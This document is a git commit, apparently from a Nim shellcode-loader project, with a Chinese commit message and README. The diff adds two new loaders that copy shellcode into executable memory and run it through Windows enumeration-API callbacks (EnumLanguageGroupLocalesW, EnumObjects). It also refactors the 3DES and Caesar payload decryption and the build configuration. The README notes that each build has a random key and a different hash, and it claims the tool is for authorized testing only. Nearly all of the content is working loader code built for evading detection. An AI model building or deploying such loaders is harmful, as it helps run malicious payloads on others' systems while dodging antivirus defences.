修复bug，增加两种加载方式

编译时只编译当前使用的加密代码，由此去掉了函数已声明但未使用的编译提示，增加了2个加载方式

Author: aeverj

Compiler.ini

@@ -19,4 +19,6 @@ EnumDirTreeW-ACE=nim cpp -d:<encrypt> -d:strip -d:release -d:source="<source>" -
 EnumDisplayMonitors-ACE=nim cpp -d:<encrypt> -d:strip -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f EnumDisplayMonitors.nim
 EnumFontFamiliesExW-ACE=nim cpp -d:<encrypt> -d:strip -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f EnumFontFamiliesExW.nim
 EnumFontFamiliesW-ACE=nim cpp -d:<encrypt> -d:strip -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f EnumFontFamiliesW.nim
-EnumFontsW-ACE=nim cpp -d:<encrypt> -d:strip -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f EnumFontsW.nim
+EnumFontsW-ACE=nim cpp -d:<encrypt> -d:strip -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f EnumFontsW.nim
+EnumLanguageGroupLocalesW-ACE=nim cpp -d:<encrypt> -d:strip -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f EnumLanguageGroupLocalesW.nim
+EnumObjects-ACE=nim cpp -d:<encrypt> -d:strip -d:release -d:source="<source>" --app:gui --opt:size -o:.\bin\ -f EnumObjects.nim

EnumLanguageGroupLocalesW.nim

@@ -0,0 +1,16 @@
+import public
+
+{.emit: """
+
+int EnumDesktopWNim(char *shellcode,SIZE_T shellcodeSize) {
+    LPVOID addr = ::VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+    ::RtlMoveMemory(addr, shellcode, shellcodeSize);
+
+    EnumLanguageGroupLocalesW((LANGGROUPLOCALE_ENUMPROCW)addr, LGRPID_ARABIC, 0, 0);
+}
+"""
+.}
+
+proc EnumLanguageGroupLocalesWNim(plainBuffer:cstring,size:cint):cint {.importcpp:"EnumDesktopWNim(@)",nodecl.}
+
+discard EnumLanguageGroupLocalesWNim(code,codelen)

EnumObjects.nim

@@ -0,0 +1,18 @@
+import public
+
+{.emit: """
+
+int EnumDesktopWNim(char *shellcode,SIZE_T shellcodeSize) {
+    LPVOID addr = ::VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+    ::RtlMoveMemory(addr, shellcode, shellcodeSize);
+    LOGFONTW lf = { 0 };
+    lf.lfCharSet = DEFAULT_CHARSET;
+    HDC dc = GetDC(NULL);
+    EnumObjects(dc, OBJ_BRUSH, (GOBJENUMPROC)addr, NULL);
+}
+"""
+.}
+
+proc EnumObjectsNim(plainBuffer:cstring,size:cint):cint {.importcpp:"EnumDesktopWNim(@)",nodecl.}
+
+discard EnumObjectsNim(code,codelen)

README.md

@@ -8,6 +8,8 @@
 
 **20220203：Fix Bug！增加14种加载`shellcode`方式，nim version>=1.6.2**
 
+**20220203：Fix Bug！增加2种加载`shellcode`方式**
+
 ## 特点：
 
 1：自带四种加载方式
@@ -17,6 +19,7 @@
 3：支持两种加密技术，分别位`3des`加密和凯撒密码，密钥随机，每次生成文件拥有不同hash
 
 <h3 style="color: red;">仅限用于技术研究和获得正式授权的测试活动。</h3>
+
 ## 文件组成：
 
 **`bin` 中存放生成的可执行文件**

public.nim

@@ -1,39 +1,40 @@
 {.passL:"-static"}
+# {.hint[XDeclaredButNotUsed]:off.}
 # {.passL:"-D:_WIN32_WINNT=0x0602"}
 {.compile: "encryption\\des.c".}
-proc D3DES_Decrypt(plainBuffer:cstring,keyBuffer:cstring,cipherBuffer:cstring,n:cint):cint {.importc,cdecl.}
-import base64,sequtils
+import base64
 
 const source {.strdefine.}: string = ""
 var code*:cstring
 var codelen*:cint = 0
-
-proc de3des(enbase64:string): void =
-    let shellcode:string = decode(enbase64) 
-    let plain_len_byte = cast[int16]([shellcode[0],shellcode[1]])
-    let input_encode:cstring = cstring(shellcode[26..high(shellcode)])
-    let key:cstring = cstring(shellcode[2..25])
-    code = cast[cstring](alloc0(plain_len_byte));
-    discard D3DES_Decrypt(input_encode,key,code,cast[cint](plain_len_byte))
-    codelen = plain_len_byte
-
-proc caesar(result:string): void =
-    let decodres = decode(result)
-    let dic = decodres[0..255].mapIt(it.byte)
-    let table = decodres[256..high(decodres)].mapIt(it.byte)
-    var deshellcode = newSeq[uint8](table.len)
-    var temp:string
-    temp.setLen(table.len)
-    for i in 0..254:
-        for k in 0..high(table):
-            temp[k] = cast[cchar](dic[table[k]])
-    code = cstring(temp)
-    codelen = cast[cint](deshellcode.len)
+const currsource:string = "\"" & source & "\""
 
 when defined(Caesar):
-    const enbase64 = staticExec("encryption\\Caesar.exe " & source)
+    import sequtils
+    proc caesar(result:string): void =
+        let decodres = decode(result)
+        let dic = decodres[0..255].mapIt(it.byte)
+        let table = decodres[256..high(decodres)].mapIt(it.byte)
+        var deshellcode = newSeq[uint8](table.len)
+        var temp:string = ""
+        temp.setLen(table.len)
+        for i in 0..254:
+            for k in 0..high(table):
+                temp[k] = cast[cchar](dic[table[k]])
+        code = cstring(temp)
+        codelen = cast[cint](deshellcode.len)
+    const enbase64 = staticExec("encryption\\Caesar.exe " & currsource)
     caesar(enbase64)
 
-when defined(TDEA):
-    const enbase64 = staticExec("encryption\\Tdea.exe " & source)
+elif defined(TDEA):
+    proc D3DES_Decrypt(plainBuffer:cstring,keyBuffer:cstring,cipherBuffer:cstring,n:cint):cint {.importc,cdecl.}
+    proc de3des(enbase64:string): void =
+        let shellcode:string = decode(enbase64) 
+        let plain_len_byte = cast[int16]([shellcode[0],shellcode[1]])
+        let input_encode:cstring = cstring(shellcode[26..high(shellcode)])
+        let key:cstring = cstring(shellcode[2..25])
+        code = cast[cstring](alloc0(plain_len_byte));
+        discard D3DES_Decrypt(input_encode,key,code,cast[cint](plain_len_byte))
+        codelen = plain_len_byte
+    const enbase64 = staticExec("encryption\\Tdea.exe " & currsource)
     de3des(enbase64)